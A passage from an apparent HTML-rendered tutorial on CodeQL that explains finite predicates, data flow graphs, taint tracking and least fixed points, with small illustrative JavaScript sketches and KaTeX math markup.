style="height:1em;vertical-align:-0.25em"></span><span class="mord mathnormal" style="margin-right:0.05764em">E</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">∣</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mopen">(</span><span class="mord mathnormal">x</span><span class="mpunct">,</span><span class="mspace" 
style="margin-right:0.1667em"></span><span class="mord mathnormal" style="margin-right:0.03588em">y</span><span class="mclose">)</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">∈</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mord mathnormal" style="margin-right:0.13889em">P</span><span class="mclose">}</span></span></span></span></span>
<p>Notice that the predicate <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>P</mi></mrow><annotation encoding="application/x-tex">P</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">P</span></span></span></span> is a finite set, because its arguments are of a finite type! (<code>Expr</code> refers to the finite set of all expressions in the CodeQL database.)
Because the query results rely on checking for membership in predicate sets, all predicates must evaluate to a finite set — otherwise it's impossible to evaluate
the query in finite time.</p>
<p>For example, this query won't work:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="codeql" data-theme="github-dark-dimmed"><code data-language="codeql" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">import</span><span style="color:#F69D50"> javascript</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">predicate</span><span style="color:#DCBDFB"> sumsTo42</span><span style="color:#ADBAC7">(</span><span style="color:#F47067">int</span><span style="color:#F69D50"> x</span><span style="color:#ADBAC7">, </span><span style="color:#F47067">int</span><span style="color:#F69D50"> y</span><span style="color:#ADBAC7">) { x </span><span style="color:#F47067">+</span><span style="color:#ADBAC7"> y </span><span style="color:#F47067">=</span><span style="color:#6CB6FF"> 42</span><span style="color:#ADBAC7"> }</span></span>
<span data-line=""> </span>
<span data-line=""><span style="color:#F47067">from</span><span style="color:#F69D50"> Expr</span><span style="color:#F69D50"> x</span><span style="color:#ADBAC7">, </span><span style="color:#F69D50">Expr</span><span style="color:#F69D50"> y</span></span>
<span data-line=""><span style="color:#F47067">where</span></span>
<span data-line=""><span style="color:#ADBAC7">  x </span><span style="color:#F47067">instanceof</span><span style="color:#F69D50"> ConstantExpr</span><span style="color:#F47067"> and</span></span>
<span data-line=""><span style="color:#ADBAC7">  y </span><span style="color:#F47067">instanceof</span><span style="color:#F69D50"> ConstantExpr</span><span style="color:#F47067"> and</span></span>
<span data-line=""><span style="color:#DCBDFB">  sumsTo42</span><span style="color:#ADBAC7">(x.</span><span style="color:#DCBDFB">getIntValue</span><span style="color:#ADBAC7">(), y.</span><span style="color:#DCBDFB">getIntValue</span><span style="color:#ADBAC7">())</span></span>
<span data-line=""><span style="color:#F47067">select</span><span style="color:#ADBAC7"> x, y</span></span></code></pre></figure>
<p>because the predicate arguments aren't bound! Clearly, <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>x</mi></mrow><annotation encoding="application/x-tex">x</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.4306em"></span><span class="mord mathnormal">x</span></span></span></span> is bound iff <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>y</mi></mrow><annotation encoding="application/x-tex">y</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.625em;vertical-align:-0.1944em"></span><span class="mord mathnormal" style="margin-right:0.03588em">y</span></span></span></span> is bound, since the equation determines each one from the other. But there are no other operators in the predicate
that could bind either variable, so the predicate is not well-defined (it would have to evaluate to an infinite subset of <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi mathvariant="double-struck">Z</mi><mo>×</mo><mi mathvariant="double-struck">Z</mi></mrow><annotation encoding="application/x-tex">\mathbb{Z} \times \mathbb{Z}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.7722em;vertical-align:-0.0833em"></span><span class="mord mathbb">Z</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">×</span><span class="mspace" style="margin-right:0.2222em"></span></span><span class="base"><span class="strut" style="height:0.6889em"></span><span class="mord mathbb">Z</span></span></span></span>), and the
compiler will helpfully throw an error.</p>
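<p>By contrast, the <code>Expr</code>-typed version of the predicate can be enumerated, because both arguments range over a finite set. Here is a minimal JavaScript sketch of that idea. The <code>database</code> array, its <code>kind</code> and <code>value</code> fields, and the helper names are hypothetical stand-ins for illustration, not CodeQL's actual representation.</p>

```javascript
// Hypothetical toy database: every expression is a record in a finite array (the set E).
const database = [
  { kind: "ConstantExpr", value: 40 },
  { kind: "ConstantExpr", value: 2 },
  { kind: "ConstantExpr", value: 21 },
  { kind: "CallExpr", value: null },
];

// Membership test for C, the constant expressions (a finite subset of E).
const isConstant = (e) => e.kind === "ConstantExpr";

// P: enumerate E x E and keep the pairs of constants whose values sum to 42.
// The double loop terminates because `exprs` is finite.
function sumsTo42Pairs(exprs) {
  const pairs = [];
  for (const x of exprs) {
    for (const y of exprs) {
      if (!isConstant(x) || !isConstant(y)) continue;
      if (x.value + y.value === 42) pairs.push([x.value, y.value]);
    }
  }
  return pairs;
}

const result = sumsTo42Pairs(database);
console.log(result);
```

<p>The same loop over all pairs of integers would never finish, which is the situation the unbound <code>int</code> version asks for.</p>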
<h2>Data flow analysis and taint tracking</h2>
<p>The real power of CodeQL lies in its ability to track data flow through a codebase. This is particularly useful for security analysis,
where one might want to find out how user input flows through the system and ends up in a dangerous place.</p>
<p>To do this, CodeQL constructs a data flow graph that represents how data flows through the code (e.g. passed between variables, functions, and expressions).
Note that this is not the same as an abstract syntax tree, which represents the syntactic structure of the code. Here's an example:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="javascript" data-theme="github-dark-dimmed"><code data-language="javascript" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">function</span><span style="color:#DCBDFB"> foo</span><span style="color:#ADBAC7">(</span><span style="color:#F69D50">p</span><span style="color:#ADBAC7">) {</span></span>
<span data-line=""><span style="color:#F47067">  let</span><span style="color:#ADBAC7"> x </span><span style="color:#F47067">=</span><span style="color:#6CB6FF"> 0</span></span>
<span data-line=""><span style="color:#F47067">  if</span><span style="color:#ADBAC7"> (p) {</span></span>
<span data-line=""><span style="color:#ADBAC7">    x </span><span style="color:#F47067">=</span><span style="color:#ADBAC7"> p.f</span></span>
<span data-line=""><span style="color:#ADBAC7">  }</span></span>
<span data-line=""><span style="color:#F47067">  return</span><span style="color:#ADBAC7"> x</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<figure class="mx-auto"><img alt="Data flow graph for a simple JavaScript program" loading="lazy" width="1108" height="408" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdfg.6c89f278.png&amp;w=1200&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdfg.6c89f278.png&amp;w=3840&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fdfg.6c89f278.png&amp;w=3840&amp;q=75"><figcaption class="text-center">Data flow graph for a simple JavaScript program</figcaption></figure>
<p>Notice how the assignments are represented as <em>edges</em>, and the conditionals are not present in the graph. We don't care that <code>x</code> is <code>0</code> if <code>p</code> is falsy —
we just need to know that <code>x</code> has possible values of <code>0</code> and <code>p.f</code>.</p>
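<p>To make the "assignments as edges" idea concrete, here is a rough JavaScript sketch that stores a graph like the one above as an edge list and asks which values may reach the <code>return</code>. The edge list and string node names are an assumed approximation of the figure, not CodeQL's actual node set, and <code>mayFlowInto</code> is a hypothetical helper.</p>

```javascript
// Hypothetical edge list approximating the data flow graph of foo.
// Each edge [from, to] means "the value of `from` may flow into `to`".
const edges = [
  ["0", "x"],        // let x = 0
  ["p.f", "x"],      // x = p.f
  ["x", "return x"], // return x
];

// Collect every node whose value may reach `target` by following edges backwards.
// The `if (p)` condition never appears: both assignments contribute edges.
function mayFlowInto(target, edgeList) {
  const seen = new Set();
  const stack = [target];
  while (stack.length !== 0) {
    const node = stack.pop();
    for (const [from, to] of edgeList) {
      if (to === node) {
        if (!seen.has(from)) {
          seen.add(from);
          stack.push(from);
        }
      }
    }
  }
  return seen;
}

const sources = mayFlowInto("return x", edges);
console.log([...sources].sort());
```

<p>Under these assumptions, both <code>0</code> and <code>p.f</code> show up as possible origins of the returned value, regardless of which branch runs.</p>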
<p>Taint tracking takes it a step further by marking certain data as "tainted", and propagating this through derived data. For example, if <code>y = foo(p)</code>,
and <code>p</code> is tainted, then <code>y</code> is also tainted, because it derives from <code>p</code>. This makes sense when analysing bugs and vulnerabilities, because if <code>p</code> is untrusted
user input, then <code>y</code> must also be treated as untrusted.</p>
<p>This is a fundamentally recursive task: given some propagation rules that determine whether the result of some operation, given tainted inputs, is also tainted,
explore the program's control flow until no more tainted data can be found.</p>
<p>In other words, find <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mo>=</mo><mi>F</mi><mo stretchy="false">(</mo><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mo stretchy="false">)</mo></mrow><annotation encoding="application/x-tex">\overline{X}=F(\overline{X})</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8833em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1.1333em;vertical-align:-0.25em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span><span class="mopen">(</span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="mclose">)</span></span></span></span> where <span class="katex"><span class="katex-mathml"><math 
xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover></mrow><annotation encoding="application/x-tex">\overline{X}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8833em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span></span></span></span> is a vector of "In's" and "Out's" representing the set of variables tainted before and after
each statement, and <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>F</mi></mrow><annotation encoding="application/x-tex">F</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span></span></span></span> is a function that applies the propagation rules. We want the <strong>least fixed point</strong>, i.e. the smallest <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover></mrow><annotation encoding="application/x-tex">\overline{X}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8833em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span></span></span></span> such that <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mo>=</mo><mi>F</mi><mo stretchy="false">(</mo><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mo stretchy="false">)</mo></mrow><annotation encoding="application/x-tex">\overline{X}=F(\overline{X})</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8833em"></span><span 
class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1.1333em;vertical-align:-0.25em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span><span class="mopen">(</span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="mclose">)</span></span></span></span>.</p>
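<p>The least fixed point can be approximated by starting from empty sets and applying the propagation rules repeatedly until nothing changes. The JavaScript sketch below does this for a small hypothetical program with a loop. The <code>program</code> encoding, the field names, and the single rule "an assignment is tainted if it reads a tainted variable or a source" are all simplifying assumptions, not how CodeQL implements taint tracking.</p>

```javascript
// Hypothetical four-statement program with a loop (statement 3 jumps back to 1).
// `uses` are the variables read, `preds` the statements that may run just before.
const program = [
  { target: "x", uses: [], source: true, preds: [] },         // 0: x = input()
  { target: "y", uses: ["z"], source: false, preds: [0, 3] }, // 1: y = z
  { target: "z", uses: ["x"], source: false, preds: [1] },    // 2: z = x
  { target: "w", uses: [], source: false, preds: [2] },       // 3: w = 0
];

// F: one application of the propagation rules to the whole vector of In/Out sets.
function F(state) {
  return program.map((stmt) => {
    // In = union of the Out sets of all predecessors.
    const inSet = new Set(stmt.preds.flatMap((p) => [...state[p].outSet]));
    // Out = In without the overwritten target, plus the target if it becomes tainted.
    const outSet = new Set(inSet);
    outSet.delete(stmt.target);
    if (stmt.source || stmt.uses.some((v) => inSet.has(v))) outSet.add(stmt.target);
    return { inSet, outSet };
  });
}

// Serialize a state so two vectors of sets can be compared for equality.
const show = (state) =>
  JSON.stringify(state.map((s) => [[...s.inSet].sort(), [...s.outSet].sort()]));

// Start from the bottom element (all sets empty) and apply F until X = F(X).
function leastFixedPoint() {
  let state = program.map(() => ({ inSet: new Set(), outSet: new Set() }));
  for (;;) {
    const next = F(state);
    if (show(next) === show(state)) return state;
    state = next;
  }
}

const fixed = leastFixedPoint();
const taintedAfter = fixed.map((s) => [...s.outSet].sort());
console.log(taintedAfter);
```

<p>In this toy program <code>y</code> only becomes tainted after the loop's back edge has carried the taint on <code>z</code> around once, which is why a single pass over the statements is not enough.</p>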
<p>A partial order is a relation that is reflexive, transitive, and antisymmetric. We can define a partial order among vectors of sets:</p>
<span class="katex-display"><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML" display="block"><semantics><mtable rowspacing="0.25em" columnalign="right" columnspacing=""><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mo>⊑</mo><mover accent="true"><msup><mi>X</mi><mo mathvariant="normal" lspace="0em" rspace="0em">′</mo></msup><mo stretchy="true">‾</mo></mover><mtext>  </mtext><mo>⟺</mo><mtext>  </mtext><mi mathvariant="normal">∀</mi><mi>i</mi><mo>⋅</mo><msub><mi>X</mi><mi>i</mi></msub><mo>⊆</mo><msubsup><mi>X</mi><mi>i</mi><mo mathvariant="normal" lspace="0em" rspace="0em">′</mo></msubsup></mrow></mstyle></mtd></mtr></mtable><annotation encoding="application/x-tex">\begin{align*}
\overline{X} \sqsubseteq \overline{X'} \iff \forall i \cdot X_i \subseteq X'_i
\end{align*}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.5433em;vertical-align:-0.5217em"></span><span class="mord"><span class="mtable"><span class="col-align-r"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:1.0217em"><span style="top:-3.1383em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊑</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.6779em"><span style="top:-2.989em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′</span></span></span></span></span></span></span></span></span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mspace" 
style="margin-right:0.2778em"></span><span class="mrel">⟺</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord">∀</span><span class="mord mathnormal">i</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">⋅</span><span class="mspace" style="margin-right:0.2222em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊆</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.8019em"><span style="top:-2.453em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span><span style="top:-3.113em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.247em"><span></span></span></span></span></span></span></span></span></span><span class="vlist-s">​</span></span><span 
class="vlist-r"><span class="vlist" style="height:0.5217em"><span></span></span></span></span></span></span></span></span></span></span></span>
<p>It's easy to see that this is a partial order: it is reflexive (since <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mi>X</mi><mi>i</mi></msub><mo>⊆</mo><msub><mi>X</mi><mi>i</mi></msub></mrow><annotation encoding="application/x-tex">X_i \subseteq X_i</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊆</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.8333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span></span></span></span>), transitive (since <span class="katex"><span 
class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mi>X</mi><mi>i</mi></msub><mo>⊆</mo><msubsup><mi>X</mi><mi>i</mi><mo mathvariant="normal" lspace="0em" rspace="0em">′</mo></msubsup><mo>∧</mo><msubsup><mi>X</mi><mi>i</mi><mo mathvariant="normal" lspace="0em" rspace="0em">′</mo></msubsup><mo>⊆</mo><msubsup><mi>X</mi><mi>i</mi><mrow><mo mathvariant="normal">′</mo><mo mathvariant="normal">′</mo></mrow></msubsup><mtext>  </mtext><mo>⟹</mo><mtext>  </mtext><msub><mi>X</mi><mi>i</mi></msub><mo>⊆</mo><msubsup><mi>X</mi><mi>i</mi><mrow><mo mathvariant="normal">′</mo><mo mathvariant="normal">′</mo></mrow></msubsup></mrow><annotation encoding="application/x-tex">X_i \subseteq X'_i \land X'_i \subseteq X''_i \implies X_i \subseteq X''_i</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊆</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1.0106em;vertical-align:-0.2587em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.7519em"><span 
style="top:-2.4413em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span><span style="top:-3.063em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.2587em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">∧</span><span class="mspace" style="margin-right:0.2222em"></span></span><span class="base"><span class="strut" style="height:1.0106em;vertical-align:-0.2587em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.7519em"><span style="top:-2.4413em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span><span style="top:-3.063em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.2587em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊆</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1.0106em;vertical-align:-0.2587em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span 
class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.7519em"><span style="top:-2.4413em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span><span style="top:-3.063em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′′</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.2587em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⟹</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.8333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊆</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1.0106em;vertical-align:-0.2587em"></span><span class="mord"><span class="mord mathnormal" 
style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.7519em"><span style="top:-2.4413em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span><span style="top:-3.063em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′′</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.2587em"><span></span></span></span></span></span></span></span></span></span>),
and antisymmetric (since <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mi>X</mi><mi>i</mi></msub><mo>⊆</mo><msubsup><mi>X</mi><mi>i</mi><mo mathvariant="normal" lspace="0em" rspace="0em">′</mo></msubsup><mo>∧</mo><msubsup><mi>X</mi><mi>i</mi><mo mathvariant="normal" lspace="0em" rspace="0em">′</mo></msubsup><mo>⊆</mo><msub><mi>X</mi><mi>i</mi></msub><mtext>  </mtext><mo>⟹</mo><mtext>  </mtext><msub><mi>X</mi><mi>i</mi></msub><mo>=</mo><msubsup><mi>X</mi><mi>i</mi><mo mathvariant="normal" lspace="0em" rspace="0em">′</mo></msubsup></mrow><annotation encoding="application/x-tex">X_i \subseteq X'_i \land X'_i \subseteq X_i \implies X_i = X'_i</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊆</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1.0106em;vertical-align:-0.2587em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" 